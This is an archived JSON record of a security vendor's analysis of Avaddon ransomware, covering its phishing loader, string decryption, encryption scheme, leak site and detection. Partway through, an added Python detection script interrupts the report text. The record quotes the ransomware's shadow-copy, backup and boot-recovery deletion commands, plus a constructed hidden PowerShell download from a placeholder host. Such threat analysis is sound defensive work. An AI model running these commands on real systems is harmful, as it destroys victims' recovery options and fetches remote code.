{
	"id": "10c50e67-d752-4f19-be4d-dc0ac2fb9e41",
	"created_at": "2026-04-06T03:36:57.042499Z",
	"updated_at": "2026-04-10T03:20:34.363191Z",
	"deleted_at": null,
	"sha1_hash": "10bfbae5ce208eb36cd731f966cd1d4a27206d75",
	"title": "Cybereason vs. Avaddon Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 857234,
	"plain_text": "Cybereason vs. Avaddon Ransomware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-06 03:11:48 UTC\r\nOver the last few months, the Cybereason Nocturnus Team has been tracking the activity of the Avaddon Ransomware. It\r\nhas been active since June 2020 and operates under the Ransomware-as-a-Service (RaaS) and double extortion models,\r\ntargeting sectors such as healthcare. Avaddon is distributed via malspam campaigns in which the victim is lured into\r\ndownloading the malware loader.\r\nKey findings\r\n• Classic Luring Technique: To lure the victim, the Avaddon loader is sent as a double extension attachment in phishing\r\nemails, tricking the victim into thinking an image of them was leaked online and sent to them.\r\n• Active Threat Group: Since its discovery in June 2020, Avaddon has remained an active threat, marking almost a year of activity.\r\n• Hybrid Encryption: Avaddon uses the popular hybrid encryption technique of combining AES and RSA keys, typical of\r\nother modern ransomware.\r\n• Double Extortion: Joining the popular double extortion trend, Avaddon operates its own “leaks website” where it\r\npublishes exfiltrated victim data if the ransom demand is not satisfied.\r\n• Use of Windows Tools: Various legitimate Windows tools are used to delete system backups and shadow copies prior to\r\nencryption of the targeted machine.\r\n• Detected and Prevented: The Cybereason Defense Platform fully detects and prevents the Avaddon ransomware.\r\nBackground\r\nThe Avaddon Ransomware was discovered in June 2020 and has remained a prominent threat ever since. Its first infection\r\nvector was phishing emails that lured victims with a supposed image of them, sent as an email\r\nattachment. 
This was in fact a double extension JavaScript downloader that downloads and executes the Avaddon\r\nRansomware:\r\nAvaddon phishing email\r\nThe ransomware is written in C++ and can be recognized by the \".avdn\" extension that is appended to encrypted files in\r\ncertain versions. Avaddon uses a hybrid encryption method, similar to other modern ransomware, using AES-256 and\r\nRSA-2048 encryption keys.\r\nhttps://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nPage 1 of 9\n\nAvaddon follows the popular double extortion technique of threatening to expose victims' data on a dedicated “leaks\r\nwebsite”, where fragments of the stolen data are also posted as leverage to force payment of the ransom demand. As of early\r\nApril 2021, the leaks website is live with multiple targets being extorted for payment:\r\nAvaddon leaks website\r\nThe Avaddon gang also recruits affiliates on hacking forums, like other known ransomware operator groups. In\r\nNovember 2020, Avaddon was reportedly delivered as a payload in Phorpiex botnet spam campaigns. Phorpiex was\r\nfirst reported in 2010 and reached one million infected users in its prime; it is one of the oldest botnets still in operation and is known to\r\nhave distributed other ransomware families before. In 2021, Avaddon added DDoS attacks against victims as further leverage to force payment.\r\nJavaScript Downloader and Avaddon Analysis\r\nThe JavaScript downloaders are fairly simple and use two built-in Microsoft tools, PowerShell and BITS, to\r\ndownload the ransomware payload from the C2 server and execute it:\r\nAvaddon download script\r\nAvaddon samples are generally not packed, and their main initial obfuscation technique is base64 encoded strings. 
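The following Python script is an added example written for this page; it is not code from the Cybereason post or from Avaddon itself. It shows the two analyst steps the analysis implies: reversing the string obfuscation described in the next paragraph (base64 decode, XOR, add 10 to each byte, XOR again) to recover the command strings, and then turning the recovery-inhibition commands from the decrypted string list into process-event detection logic that separates the pre-encryption burst of those commands from a lone administrative use of the same tools. The XOR key values (KEY_1, KEY_2), the obfuscated sample blobs, the host names and process events, the example.invalid URL, the Start-BitsTransfer and bitsadmin command forms, and the choice of WmiPrvSE.exe as parent of the recovery commands are all assumptions constructed for the example; Avaddon's real key values are not given in the post and have to be read from the decrypt loop in the sample.

```python
import base64
from collections import defaultdict
from datetime import datetime, timedelta
# Step 1: reverse the string obfuscation (base64 -> XOR -> add 10 -> XOR).
# KEY_1/KEY_2 are assumed single-byte values; the post does not give the real keys.
KEY_1, KEY_2 = b'k', b'Q'

def decode_string(encoded, key1=KEY_1, key2=KEY_2):
    '''base64-decode, XOR with key1, add 10 (mod 256), XOR with key2; keys cycle.'''
    out = bytearray()
    for i, b in enumerate(base64.b64decode(encoded)):
        out.append((((b ^ key1[i % len(key1)]) + 10) & 0xFF) ^ key2[i % len(key2)])
    return bytes(out).decode('utf-8', errors='replace')

def encode_string(plain, key1=KEY_1, key2=KEY_2):
    '''Inverse of decode_string; used only to build the constructed sample blobs.'''
    out = bytearray()
    for i, b in enumerate(plain.encode('utf-8')):
        out.append((((b ^ key2[i % len(key2)]) - 10) & 0xFF) ^ key1[i % len(key1)])
    return base64.b64encode(bytes(out)).decode('ascii')

# Commands quoted in the decrypted string list, re-obfuscated with the assumed keys.
RECOVERED_COMMANDS = [
    'wmic SHADOWCOPY DELETE /nointeractive',
    'wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0',
    'vssadmin Delete Shadows /All /Quiet',
    'bcdedit /set {default} recoveryenabled No',
    'bcdedit /set {default} bootstatuspolicy ignoreallfailures',
]
SAMPLE_BLOBS = [encode_string(s) for s in RECOVERED_COMMANDS]

# Step 2: rules derived from those commands: tool image name plus the stable part
# of the command line, so extra switches or odd spacing do not evade the match.
RECOVERY_INHIBITION = [
    ('wmic.exe', 'shadowcopy delete'),
    ('wbadmin.exe', 'delete systemstatebackup'),
    ('vssadmin.exe', 'delete shadows'),
    ('bcdedit.exe', 'recoveryenabled no'),
    ('bcdedit.exe', 'bootstatuspolicy ignoreallfailures'),
]
SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}

def basename(image):  # last path component, either separator (chr(92) is a backslash)
    return image.replace('/', chr(92)).rsplit(chr(92), 1)[-1].lower()

def normalise(cmdline):  # lower-case and collapse whitespace before matching
    return ' '.join(cmdline.lower().split())

def match_recovery_inhibition(event):
    '''Return the matched command fragment, or None.'''
    image, cmd = basename(event['image']), normalise(event['cmdline'])
    return next((frag for exe, frag in RECOVERY_INHIBITION
                 if image == exe and frag in cmd), None)

def is_script_host_bits_download(event):
    '''wscript/cscript launching a BITS download, the loader shape described above.
    Start-BitsTransfer and bitsadmin /transfer are assumed forms of that download.'''
    if basename(event['parent']) not in SCRIPT_HOSTS:
        return False
    image, cmd = basename(event['image']), normalise(event['cmdline'])
    return ((image == 'powershell.exe' and 'start-bitstransfer' in cmd)
            or (image == 'bitsadmin.exe' and '/transfer' in cmd))

def analyze(events, window=timedelta(minutes=5)):
    '''Per host: a loader chain is medium; one recovery-inhibition command is low
    (administrators run these too); two or more distinct ones inside the window is
    high, the pre-encryption burst seen in the process tree shown further down.'''
    alerts, hits = [], defaultdict(list)
    for ev in sorted(events, key=lambda e: e['time']):
        if is_script_host_bits_download(ev):
            alerts.append((ev['host'], 'medium', [ev['cmdline']]))
        frag = match_recovery_inhibition(ev)
        if frag:
            hits[ev['host']].append((ev['time'], frag, ev['cmdline']))
    for host, hs in hits.items():
        for t0, _, _ in hs:  # sliding window anchored at each hit in turn
            burst = [h for h in hs if t0 <= h[0] <= t0 + window]
            if len({h[1] for h in burst}) >= 2:
                alerts.append((host, 'high', [h[2] for h in burst]))
                break
        else:
            alerts.extend((host, 'low', [h[2]]) for h in hs)
    return alerts

def event(host, time, parent, image, cmdline):
    return {'host': host, 'time': datetime.fromisoformat(time),
            'parent': parent, 'image': image, 'cmdline': cmdline}

# Constructed process-creation events, not telemetry from the report. The WMI strings
# (ROOT CIMV2, Win32_Process, Create, CommandLine) imply the recovery commands are
# launched through WMI, so they are parented to WmiPrvSE.exe here.
SAMPLE_EVENTS = [
    event('WS01', '2021-04-01T09:00:03', 'wscript.exe', 'powershell.exe',
          'powershell -w hidden Start-BitsTransfer -Source http://example.invalid/x -Destination $env:TEMP'),
    event('WS01', '2021-04-01T09:00:25', 'WmiPrvSE.exe', 'C:/Windows/System32/wbem/WMIC.exe', RECOVERED_COMMANDS[0]),
    event('WS01', '2021-04-01T09:00:26', 'WmiPrvSE.exe', 'wbadmin.exe', RECOVERED_COMMANDS[1]),
    event('WS01', '2021-04-01T09:00:27', 'WmiPrvSE.exe', 'vssadmin.exe', RECOVERED_COMMANDS[2]),
    event('WS01', '2021-04-01T09:00:28', 'WmiPrvSE.exe', 'bcdedit.exe', RECOVERED_COMMANDS[3]),
    event('SRV02', '2021-04-01T22:30:00', 'cmd.exe', 'vssadmin.exe', 'vssadmin Delete Shadows /For=D: /Oldest /Quiet'),
]
```

Calling decode_string on SAMPLE_BLOBS returns the five commands, and analyze(SAMPLE_EVENTS) yields a medium alert for the script-host download, a high alert for the four recovery-inhibition commands on WS01, and a low alert for the single shadow deletion on SRV02. In practice the blobs come from a strings dump of the binary and the events from Sysmon Event ID 1 or Windows 4688 process-creation logs, with the full image path in the image field.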
In order\r\nto reveal the plaintext strings, each base64-decoded string is XORed, 10 is added to each byte, and the result is XORed\r\nonce again:\r\nString decryption loop\r\nAfter decryption, the following strings are revealed. They include the commands executed to delete shadow copies and\r\nbackups, the system paths to include or exclude while encrypting the system, the malware’s mutex name and more:\r\nGlobal\\{8ACC12C0-4D9B-4F77-A47C-3592E699B86F}\r\nROOT\\CIMV2\r\nCreate\r\nWin32_Process\r\nCommandLine\r\nwmic SHADOWCOPY DELETE /nointeractive\r\nwbadmin DELETE SYSTEMSTATEBACKUP\r\nwbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest\r\nwbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0\r\nvssadmin Delete Shadows /All /Quiet\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nSYSTEMDRIVE\r\nPROGRAMFILES(x86)\r\nUSERPROFILE\r\nProgramData\r\nProgram Files\r\nALLUSERSPROFILE\r\nAppData\r\nPUBLIC\r\nTMP\r\nTor Browser\r\nMSOCache\r\nEFI\r\n\\Windows\r\n\\WINDOWS\r\n\\Program Files\r\n\\Users\\All Users\r\n\\AppData\r\n\\Microsoft\\Windows\r\n\\Program Files\\Microsoft\\Exchange Server\r\n\\Program Files (x86)\\Microsoft\\Exchange Server\r\n\\Program Files\\Microsoft SQL Server\r\n\\Program Files (x86)\\Microsoft SQL Server\r\n\\Program Files\\mysql\r\n\\Program Files (x86)\\mysql\r\nDecrypted strings list\r\nThe ROOT\\CIMV2, Win32_Process, Create and CommandLine strings indicate that these commands are issued through WMI (Win32_Process.Create) rather than spawned directly, which matters for detection: the utilities then appear under WmiPrvSE.exe in process telemetry rather than under the ransomware process itself.\r\nWhen executed with Cybereason Anti-Ransomware prevention turned off, the following execution of the Avaddon\r\nRansomware along with its child processes can be observed in the Cybereason Defense Platform:\r\nAs seen in the Cybereason Defense Platform with Anti-Ransomware disabled\r\nAvaddon itself has various anti-debugging and anti-analysis techniques, including checking the system locale using a library function in\r\nthis 
variant, but also listing analysis and VM-related tools that might interfere with its execution, as well as the file extensions of\r\ninterest. This information is also hidden and is decrypted using a slightly different algorithm:\r\nSecond strings decryption method\r\nBelow is a table of the decrypted strings. The ransom note is decrypted in the same way:\r\nDecrypted strings\r\nFile extensions: .exe,.bin,.sys,.ini,.dll,.lnk,.dat,.exe,.drv,.rdp,.prf,.swp\r\nDatabase file extensions: .mdf,.mds,.sql\r\nProcess names: sqlservr.exe,sqlmangr.exe,RAgui.exe,QBCFMonitorService.exe,supervise.exe,fdhost.exe,Culture.exe,RTVscan.exe,Defwatch.exe,wxServerView.exe,sq\r\nService names: DefWatch,ccEvtMgr,ccSetMgr,SavRoam,dbsrv12,sqlservr,sqlagent,Intuit.QuickBooks.FCS,dbeng8,sqladhlp,QBIDPService,Culserver,RTVscan,vmwar\r\nSecond method decrypted strings\r\nFor encryption, this variant uses the known hybrid encryption routine combining hardcoded AES and RSA keys. In the usual form of this scheme the file contents are encrypted with AES and the AES key material is protected with the RSA public key embedded in the sample, so recovery without paying requires the operator's RSA private key:\r\nAvaddon AES and RSA encryption keys\r\nOnce the files are encrypted, a Python installation folder, for example, looks like the following; note that files with executable extensions were skipped and left unencrypted:\r\nPython installation folder encrypted by Avaddon\r\nThe ransom note directs the victim to the Tor payment website:\r\nAvaddon ransom note\r\nFinally, when browsing to the website mentioned in the ransom note, the victim can enter their unique ID to obtain the Bitcoin\r\nwallet address and payment instructions:\r\nAvaddon website for victim registration\r\nCybereason Detection and Prevention\r\nThe Cybereason Defense Platform detects the Avaddon executable together with the Windows utilities it executes and triggers\r\na Malop™ for it:\r\nWhen the Cybereason Anti-Ransomware prevention feature is 
enabled, the execution of the Avaddon samples is prevented\r\nby the AI module:\r\nCybereason Defense Platform Detecting Avaddon\r\nSecurity Recommendations\r\n• Enable the Anti-Ransomware Feature on Cybereason NGAV: Set Cybereason Anti-Ransomware protection mode to\r\nPrevent - more information for customers can be found here\r\n• Enable Anti-Malware Feature on Cybereason NGAV: Set Cybereason Anti-Malware mode to Prevent and set the\r\ndetection mode to Moderate and above - more information can be found here\r\n• Keep Systems Fully Patched: Make sure your systems are patched in order to mitigate vulnerabilities\r\n• Regularly Back Up Files to a Remote Server: Restoring your files from a backup is the fastest way to regain access to\r\nyour data; keep copies offline or otherwise unreachable from the endpoint, since Avaddon deletes local shadow copies and system state backups before encrypting\r\n• Use Security Solutions: Protect your environment using organizational firewalls, proxies, web filtering, and mail filtering\r\nMITRE ATT\u0026CK BREAKDOWN\r\nExecution: Command and Scripting Interpreter\r\nPrivilege Escalation: Application Shimming\r\nDefense Evasion: Virtualization/Sandbox Evasion; Deobfuscate/Decode Files or Information; Obfuscated Files or Information; File Deletion\r\nDiscovery: System Time Discovery; Security Software Discovery; Virtualization/Sandbox Evasion; Process Discovery; Peripheral Device Discovery; System Network Configuration Discovery; File and Directory Discovery; System Information Discovery\r\nCollection: Data from Local System\r\nImpact: Data Encrypted for Impact; Inhibit System Recovery\r\nAbout the Researcher:\r\nDaniel Frank\r\nDaniel Frank is a senior Malware Researcher at Cybereason. 
Prior to Cybereason, Frank was a Malware Researcher at F5\r\nNetworks and RSA Security. His core roles as a Malware Researcher include researching emerging threats, reverse-engineering malware and developing security-driven code. Frank has a BSc degree in information systems.\r\nAbout the Author\r\nCybereason Nocturnus\r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and\r\nenterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies,\r\nreverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first\r\nto release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nSource: https://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware"
	],
	"report_names": [
		"cybereason-vs.-avaddon-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775446617,
	"ts_updated_at": 1775791234,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/10bfbae5ce208eb36cd731f966cd1d4a27206d75.pdf",
		"text": "https://archive.orkl.eu/10bfbae5ce208eb36cd731f966cd1d4a27206d75.txt",
		"img": "https://archive.orkl.eu/10bfbae5ce208eb36cd731f966cd1d4a27206d75.jpg"
	}
}